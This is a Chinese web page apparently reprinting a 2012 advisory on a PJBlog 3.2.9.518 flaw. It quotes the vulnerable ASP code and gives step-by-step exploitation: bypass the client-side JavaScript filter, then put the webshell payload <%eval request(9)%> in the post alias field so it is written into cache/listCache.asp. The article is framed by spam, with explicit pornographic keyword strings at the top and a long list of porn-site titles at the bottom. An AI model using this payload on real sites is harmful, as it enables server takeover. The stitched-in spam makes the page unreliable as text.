男人吃奶摸下挵进去好爽,日日躁夜夜躁狠狠躁,freesexvide0s性欧美高清,高清freexxxx性国产,无码人妻一区二区三区一,乱人伦中文字幕成人网站在线,亚洲欧美综合一区二区三区 ,神马影院在线视频观看
知識學堂
  • ·聯系電話:+86.023-75585550
  • ·聯系傳真:+86.023-75585550
  • ·24小時手機:13896886023
  • ·QQ 咨 詢:361652718 513960520
當前位置 > 首頁 > 知識學堂 > 常見技術問題
PJBlog 3.2.9.518 getwebshell 漏洞
更新時間:2012-05-14 | 發布人:本站 | 點擊率:440
版本:PJblog 3.2.9.518(2012/5/9日時為最新版本)
 
漏洞利用條件:
 
1、使用全靜態模式(默認情況是全靜態模式)
 
2、用戶可以發帖(默認普通用戶不能發帖,所以有點雞肋)
 
漏洞描述:PJblog 3.2.9.518使用js過濾特殊字符,在使用全靜態模式下,普通用戶發帖即可插入asp一句話木馬。
 
 
PJblog 3.2.9.518的安全還是非常不錯,密碼采用了sha1(pass+salt)方式,salt為6位,在這樣的情況下,對注入還是非常有效,即使拿到密碼也很難破解。
 
class/cls_logAction.asp部分代碼如下:
 
<%
Class logArticle
………………省略………………
outIndex = outIndex & "[""A"";"&AListC&";("&clearT(AList)&")] " & Chr(13)
outIndex = outIndex & "[""G"";"&GListC&";("&clearT(GList)&")] " & Chr(13)
Dim CateKeys, CateItems, CateHKeys, CateHItems
CateKeys = CateDic.Keys
CateItems = CateDic.Items
CateHKeys = CateHDic.Keys
CateHItems = CateHDic.Items
For i = 0 To CateDic.Count -1
outIndex = outIndex & "["""&CateKeys(i)&""";"&CateHItems(i)&";("&clearT(CateItems(i))&")] " & Chr(13)
Next
 
SaveList = SaveToFile(outIndex, "cache/listCache.asp")
 
%>
 
SaveToFile函數是將outIndex內容寫入到cache/listCache.asp中。
 
blogpost.asp中調用了 logArticle,部分代碼如下:
 
<%
……………………
Set lArticle = New logArticle
lArticle.categoryID = request.Form("log_CateID")
lArticle.logTitle = request.Form("title")
lArticle.logAuthor = memName
lArticle.logEditType = request.Form("log_editType")
lArticle.logIntroCustom = request.Form("log_IntroC")
lArticle.logIntro = request.Form("log_Intro")
lArticle.logWeather = request.Form("log_weather")
lArticle.logLevel = request.Form("log_Level")
lArticle.logCommentOrder = request.Form("log_comorder")
lArticle.logDisableComment = request.Form("log_DisComment")
lArticle.logIsShow = IsShow
lArticle.logIsTop = request.Form("log_IsTop")
lArticle.logIsDraft = request.Form("log_IsDraft")
lArticle.logFrom = request.Form("log_From")
lArticle.logFromURL = request.Form("log_FromURL")
lArticle.logDisableImage = request.Form("log_disImg")
lArticle.logDisableSmile = request.Form("log_DisSM")
lArticle.logDisableURL = request.Form("log_DisURL")
lArticle.logDisableKeyWord = request.Form("log_DisKey")
lArticle.logMessage = request.Form("Message")
lArticle.logTrackback = request.Form("log_Quote")
lArticle.logTags = request.Form("tags")
lArticle.logPubTime = request.Form("PubTime")
lArticle.logPublishTimeType = request.Form("PubTimeType")
If blog_postFile = 2 Then
lArticle.logCname = request.Form("cname")
lArticle.logCtype = request.Form("ctype")
End If
lArticle.logReadpw = pws
lArticle.logPwtips = pwtips
lArticle.logPwtitle = pwtitle
lArticle.logPwcomm = pwcomm
lArticle.logMeta = request.Form("log_Meta")
lArticle.logKeyWords = keyword
lArticle.logDescription = B_description
if request.form("FirstPost") = 1 then
lArticle.isajax = false
lArticle.logIsDraft = false
postLog = lArticle.editLog(request.Form("postbackId"))
else
lArticle.isajax = false
postLog = lArticle.postLog
end if
Set lArticle = Nothing
%>
 
lArticle.logCname = request.Form(“cname”),并沒有過濾”<%” 和”%>”
 
漏洞利用方法:
 
1、用戶登陸,發表文章,如下圖:
2、禁止本地js,必須要使用這步,否則你無法輸入’<’和’>’,因為作者已經考慮到安全問題,調用common.js本地過濾,
 
common/common.js 部份內容如下:
 
1
//創建文件夾規則 example:
2
//<input onblur="ReplaceInput(this,window.event)" onkeyup="ReplaceInput(this,window.event)" />
3
function ReplaceInput(obj, cevent){
4
 var str = ["<", ">", "/", "\\", ":", "*", "?", "|", "\"", /[\u4E00-\u9FA5]/g];
5
 if(cevent.keyCode != 37 && cevent.keyCode != 39){
6
 //obj.value = obj.value.replace(/[\u4E00-\u9FA5]/g,'');
7
 for (var i = 0 ; i < str.length ; i++){
8
 obj.value = obj.value.replace(str[i], "");
9
 }
10
 }
11
}
3、在別名處插入<%eval request(9)%>,提交后,即可在cache/listCache.asp中會寫入一句話木馬,密碼為9
 
臨時解決方案,禁止普通用戶發帖,
分享到: QQ空間 新浪微博 開心網 人人網
主站蜘蛛池模板: 亚洲精品成人片在线播放| 国产av亚洲精品久久久久久| 国产精品久久精品国产| 国产人碰人摸人爱视频| 免费免费啪视频观看视频| 中文字幕 日韩精品 在线| 亚洲婷婷综合色高清在线| 国产精品视频全国免费观看| 国产精品美女乱子伦高| 色婷婷综合激情综在线播放| 一区二区三区国产亚洲网站| av无码精品一区二区三区| 1区2区3区4区产品乱码入口 | 二人世界完整版在线观看| 在线天堂资源www中文| 日本不卡一区二区三区| 日本欧美一区二区三区乱码| 任我爽精品视频在线播放| 色欲av永久无码精品无码| 国产精品久久久久久久久ktv| 亚洲精品无码aⅴ中文字幕蜜桃 | 亚洲国产欧美在线人成最新| 波多野结衣av无码| 国产精品国产三级国产专区50| 成人试看120秒体验区| 入禽太深免费观看| aⅴ久久欧美丝袜综合| 久久久国产精品午夜一区| 亚洲人成色77777在线观看| 日产电影一区二区三区| 久久露脸国产精品| 女人扒开屁股桶爽30分钟高潮| 国产成人精品日本亚洲专区61| 国产毛多水多高潮高清| 老熟女高潮喷了一地| 小蜜被两老头吸奶头| 姑娘免费观看完整版高清中文| 人人妻人人澡人人爽| 亚洲av无码乱码国产麻豆穿越 | 好大好深好猛好爽视频免费| 麻花豆传媒剧国产mv|